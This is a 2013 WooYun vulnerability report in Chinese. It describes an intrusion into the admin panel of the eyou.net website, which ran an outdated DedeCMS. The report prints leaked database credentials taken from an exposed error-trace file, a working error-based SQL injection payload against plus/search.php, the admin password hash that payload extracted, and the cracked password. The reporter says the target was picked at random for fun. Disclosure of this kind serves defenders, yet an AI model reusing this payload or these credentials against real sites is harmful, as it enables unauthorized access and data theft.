漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-021858
漏洞标题:亿中邮(亿邮)信息技术官方网站沦陷,已成功进入后台
相关厂商:北京亿中邮信息技术有限公司
漏洞作者: 钱途
提交时间:2013-04-14 23:00
修复时间:2013-05-29 23:01
公开时间:2013-05-29 23:01
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-04-14: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-26: 细节向核心白帽子及相关领域专家公开
2013-05-06: 细节向普通白帽子公开
2013-05-16: 细节向实习白帽子公开
2013-05-29: 细节向公众公开
简要描述:
今天本身没事。为了不让他买叫我盲打王。 所以就打算随便找一个厂商 进行一次 脚本入侵。然后就找到了“亿中邮信息技术” 我大概说一下。没拿下webshell 后台设置了禁止写入。包括数据库备份 根本不可能。另外上传页面直接删除掉了。 但是你们网站的问题很大。 整个入侵过程一共是 20分钟。你们后台就沦陷了!·下面我大概讲一下入侵的整个思路
详细说明:
首先是网站主站有个意见反馈。然后我就很随意的 插入代码了。但是。返回的提交成功 一看就知道 dedecms页面。 然后我就知道。肯定是 失败的。 然后打开data/admin/ver.txt 发现版本很老啊。
然后测试打开http://www.eyou.net/data/mysql_error_trace.inc
的时候。我震惊了。这种是不可能出现的事情。 还是发生了。里面不光有后台地址。还有
5Bcfg_dbhost%5D=180.186.12.6&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=qq1314520&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=mysql&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB
mysql一般情况下是链接不上的。 所以就不做测试了。除非他开启了%号。但是这个基本不太可能。当知道了版本 还知道了后台就更简单了。dedecms最近很火。各种注入 各种爆。 然后就找到了一个代码如下
plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
然后就出现了
Error infos: Duplicate entry '1|admin|e41aa72de59c63006aad' for key 'group_key'
去出md5 前3后1 不用我多说。 CMD解密的密码是1111aaaa 还是aaaa1111具体哪个我忘记了。大概就是这个。然后登陆成功登陆后台。在拿webshell的时候。发现
配置文件'/data/www_eyou_net/data/config.cache.inc.php'不支持写入,无法修改系统配置参数! 而且上传页面也删除了。不管是备份也好。 还是提交任意文章也好。全部都是这样。于是。我认为还是算了。万一 点错了 删除掉那个文件就不好了。下面是图片
漏洞证明:
修复方案:
有礼物么?能不忽视么?能给 20分么?
版权声明:转载请注明来源 钱途@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-04-16 10:10
厂商回复:
eyou.net目前并不涉及我们主要的业务数据,非常感谢反馈,我们正积极修补此问题。
最新状态:
暂无